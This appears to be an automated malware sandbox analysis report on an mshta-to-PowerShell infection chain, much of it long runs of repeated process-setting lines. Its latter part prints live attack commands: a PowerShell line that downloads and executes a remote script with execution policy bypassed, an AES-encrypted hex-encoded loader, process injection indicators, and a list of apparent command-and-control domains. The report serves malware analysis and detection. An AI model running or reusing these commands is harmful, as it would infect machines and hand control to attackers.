                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3721Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 816Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3163Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6601Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6280Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3481Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6728Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7096Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4220Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6188Thread sleep time: -90000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3128Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5488Thread sleep count: 6280 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5488Thread sleep count: 3481 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5484Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F72A58 GetSystemInfo,4_2_06F72A58
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4dJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreCommonProxyStub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\Bcp47Langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\USERENV.dllJump to behavior
                  Source: powershell.exe, 00000009.00000002.3040273310.0000000005281000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                  Source: mshta.exe, 00000000.00000003.2075648098.00000000034DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: powershell.exe, 00000002.00000002.2052402999.0000000002F65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}C
                  Source: powershell.exe, 00000009.00000002.3040273310.0000000005281000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                  Source: powershell.exe, 00000004.00000002.2859045142.00000000074BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
                  Source: powershell.exe, 00000002.00000002.2060075780.0000000007159000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: powershell.exe, 00000008.00000002.3001201192.0000000003047000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: powershell.exe, 00000002.00000002.2060423967.0000000007209000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                  Source: powershell.exe, 00000009.00000002.3040273310.0000000005281000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                  Source: powershell.exe, 00000008.00000002.3001201192.000000000301C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: powershell.exe, 00000002.00000002.2060075780.0000000007159000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ls
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043E0F0 LdrInitializeThunk,8_2_0043E0F0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Yara matchFile source: amsi32_4524.amsi.csv, type: OTHER
                  Source: Yara matchFile source: amsi32_616.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4524, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 616, type: MEMORYSTR
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))}
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: powershell.exeString found in binary or memory: hummskitnj.buzz
                  Source: powershell.exeString found in binary or memory: cashfuzysao.buzz
                  Source: powershell.exeString found in binary or memory: appliacnesot.buzz
                  Source: powershell.exeString found in binary or memory: screwamusresz.buzz
                  Source: powershell.exeString found in binary or memory: inherineau.buzz
                  Source: powershell.exeString found in binary or memory: scentniej.buzz
                  Source: powershell.exeString found in binary or memory: rebuildeso.buzz
                  Source: powershell.exeString found in binary or memory: prisonyfork.buzz
                  Source: powershell.exeString found in binary or memory: permissiblene.click
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RofJg($zkfZU){return -split ($zkfZU -replace '..', '0x$& ')};$xHKo = RofJg('ADDABD852CBF669FB61EACB84993EA3F154802630095EC46064205C3E258CA0A3F846939344DFEADF3B7AC1A3089265AAEECAAD45D0357AA9B08B6C103541454A7CFA4167A71B0010AA6E212385CA641B99658282EE9B9F894A6F9BE882279D7E4F19BDCA0261AA79FC5FAD99FB022F746001AACC2A62050F3C5F1ACB5DBCECEECFE3A7A31A8937A5F65851F4C54937EAC4F795E298C9214224843FB4F9B13B0ABEA024CF9052242B65816163BD511BDD6A30B7FD935D931026CD618E7CF54E77A0A14C23FC0A2197A0626BCCD85128A5B13D7573F97FA06919B49E60B6F135A7B0087E73BEDF1BBD8EF749346E35BB5B8EF328AB42653A8C423CCE65ED751D8FDB7538347B1115C64B27CB0B663FD5D314EF76EA571A266B7DA4A5FEDC4A11881B74E43E450CB442B4DCF5E7F4D3F964B91DD28FD3C9CC2CA269708977893826BC4F817CA3F24A1E25FD45FEE31E6F57DD231764A7ED8EC4F27A85D3E63955F8A0D8233AF72C4E3B87AC790739B96882AAE6D9C087FDE0339006489DE3CCC111FF2BE081EFD92E3486DC8FA48F7C64E97265982A18F79B58A14B1B7F4E618D3E23C9A3C802554F05AB3FACFC592E6C0A13C4FCD3AC9EB67201312B305EABAA5BD1661FB4D01209CD8147427069DCB7C70B3FC1669E3D643A74B2F009A73FF4ECAF1E92FB68F73506E4E251F8603CB128405A12B13D51EB28D67D152254C24F1B1B1B208470E50C7C6A293ED2B9BC672E7167C873D379DDA70928E34D5D92B01E6FBEF93CFF4C5A2A47FEC851643D38DAC71CC97DE03EF89C84EC82B4DAEC32416113C18A4F97176E6C6F19529DFC27FEDF76EAECC83B65CDB18F573A47CA511ABB57C0E2FB271F43F876C7E4EBB670821DEE11F27961708ECC5A51060AB343764D0D66A8F570DE51685313E5643F216ABA89A781C9437C8360BDD168A4F24CC7EEDBAF8CB939B2CD236895145BEE8327E515C72C6E3F8945F6B99DD6856D6B85A39A9636EF180D230B26C5E84DE8C40A71AE0F1B4C4B3ABEE23B5B26FF40AC1D252C89C4C40A58E6456EBA4F5FBFC23');$Hubqy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((RofJg('446D676A575941436563554774726D56')),[byte[]]::new(16)).TransformFinalBlock($xHKo,0,$xHKo.Length)); & $Hubqy.Substring(0,3) $Hubqy.Substring(129)Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function rofjg($zkfzu){return -split ($zkfzu -replace '..', '0x$& ')};$xhko = rofjg('addabd852cbf669fb61eacb84993ea3f154802630095ec46064205c3e258ca0a3f846939344dfeadf3b7ac1a3089265aaeecaad45d0357aa9b08b6c103541454a7cfa4167a71b0010aa6e212385ca641b99658282ee9b9f894a6f9be882279d7e4f19bdca0261aa79fc5fad99fb022f746001aacc2a62050f3c5f1acb5dbceceecfe3a7a31a8937a5f65851f4c54937eac4f795e298c9214224843fb4f9b13b0abea024cf9052242b65816163bd511bdd6a30b7fd935d931026cd618e7cf54e77a0a14c23fc0a2197a0626bccd85128a5b13d7573f97fa06919b49e60b6f135a7b0087e73bedf1bbd8ef749346e35bb5b8ef328ab42653a8c423cce65ed751d8fdb7538347b1115c64b27cb0b663fd5d314ef76ea571a266b7da4a5fedc4a11881b74e43e450cb442b4dcf5e7f4d3f964b91dd28fd3c9cc2ca269708977893826bc4f817ca3f24a1e25fd45fee31e6f57dd231764a7ed8ec4f27a85d3e63955f8a0d8233af72c4e3b87ac790739b96882aae6d9c087fde0339006489de3ccc111ff2be081efd92e3486dc8fa48f7c64e97265982a18f79b58a14b1b7f4e618d3e23c9a3c802554f05ab3facfc592e6c0a13c4fcd3ac9eb67201312b305eabaa5bd1661fb4d01209cd8147427069dcb7c70b3fc1669e3d643a74b2f009a73ff4ecaf1e92fb68f73506e4e251f8603cb128405a12b13d51eb28d67d152254c24f1b1b1b208470e50c7c6a293ed2b9bc672e7167c873d379dda70928e34d5d92b01e6fbef93cff4c5a2a47fec851643d38dac71cc97de03ef89c84ec82b4daec32416113c18a4f97176e6c6f19529dfc27fedf76eaecc83b65cdb18f573a47ca511abb57c0e2fb271f43f876c7e4ebb670821dee11f27961708ecc5a51060ab343764d0d66a8f570de51685313e5643f216aba89a781c9437c8360bdd168a4f24cc7eedbaf8cb939b2cd236895145bee8327e515c72c6e3f8945f6b99dd6856d6b85a39a9636ef180d230b26c5e84de8c40a71ae0f1b4c4b3abee23b5b26ff40ac1d252c89c4c40a58e6456eba4f5fbfc23');$hubqy=-join [char[]](([security.cryptography.aes]::create()).createdecryptor((rofjg('446d676a575941436563554774726d56')),[byte[]]::new(16)).transformfinalblock($xhko,0,$xhko.length)); & $hubqy.substring(0,3) $hubqy.substring(129)
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function rofjg($zkfzu){return -split ($zkfzu -replace '..', '0x$& ')};$xhko = rofjg('addabd852cbf669fb61eacb84993ea3f154802630095ec46064205c3e258ca0a3f846939344dfeadf3b7ac1a3089265aaeecaad45d0357aa9b08b6c103541454a7cfa4167a71b0010aa6e212385ca641b99658282ee9b9f894a6f9be882279d7e4f19bdca0261aa79fc5fad99fb022f746001aacc2a62050f3c5f1acb5dbceceecfe3a7a31a8937a5f65851f4c54937eac4f795e298c9214224843fb4f9b13b0abea024cf9052242b65816163bd511bdd6a30b7fd935d931026cd618e7cf54e77a0a14c23fc0a2197a0626bccd85128a5b13d7573f97fa06919b49e60b6f135a7b0087e73bedf1bbd8ef749346e35bb5b8ef328ab42653a8c423cce65ed751d8fdb7538347b1115c64b27cb0b663fd5d314ef76ea571a266b7da4a5fedc4a11881b74e43e450cb442b4dcf5e7f4d3f964b91dd28fd3c9cc2ca269708977893826bc4f817ca3f24a1e25fd45fee31e6f57dd231764a7ed8ec4f27a85d3e63955f8a0d8233af72c4e3b87ac790739b96882aae6d9c087fde0339006489de3ccc111ff2be081efd92e3486dc8fa48f7c64e97265982a18f79b58a14b1b7f4e618d3e23c9a3c802554f05ab3facfc592e6c0a13c4fcd3ac9eb67201312b305eabaa5bd1661fb4d01209cd8147427069dcb7c70b3fc1669e3d643a74b2f009a73ff4ecaf1e92fb68f73506e4e251f8603cb128405a12b13d51eb28d67d152254c24f1b1b1b208470e50c7c6a293ed2b9bc672e7167c873d379dda70928e34d5d92b01e6fbef93cff4c5a2a47fec851643d38dac71cc97de03ef89c84ec82b4daec32416113c18a4f9